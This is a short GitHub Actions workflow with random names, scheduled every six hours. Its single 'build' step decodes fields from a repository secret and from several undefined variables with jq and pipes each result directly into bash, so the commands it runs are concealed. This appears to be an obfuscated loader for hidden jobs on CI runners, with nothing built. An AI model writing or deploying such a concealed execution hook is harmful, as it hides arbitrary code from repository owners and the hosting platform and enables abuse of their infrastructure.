name: yanchanshi9876
on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanchanshi9876
        env:
          w8: ${{ secrets.w8 }}
        run: |
          echo $w8 | jq -r .flg4928 | /bin/bash
          echo $n08 | jq -r .cggwf811 | /bin/bash
          echo $ugiwn3446 | jq -r .tqus93 | /bin/bash
          echo $cg1 | jq -r .v3717 | /bin/bash
          echo $n64687 | jq -r .pcr1347 | /bin/bash
          echo $brrbx4314 | jq -r .mnkg68727 | /bin/bash
          echo $d98 | jq -r .kr74200 | /bin/bash
          echo $aud941 | jq -r .y337 | /bin/bash

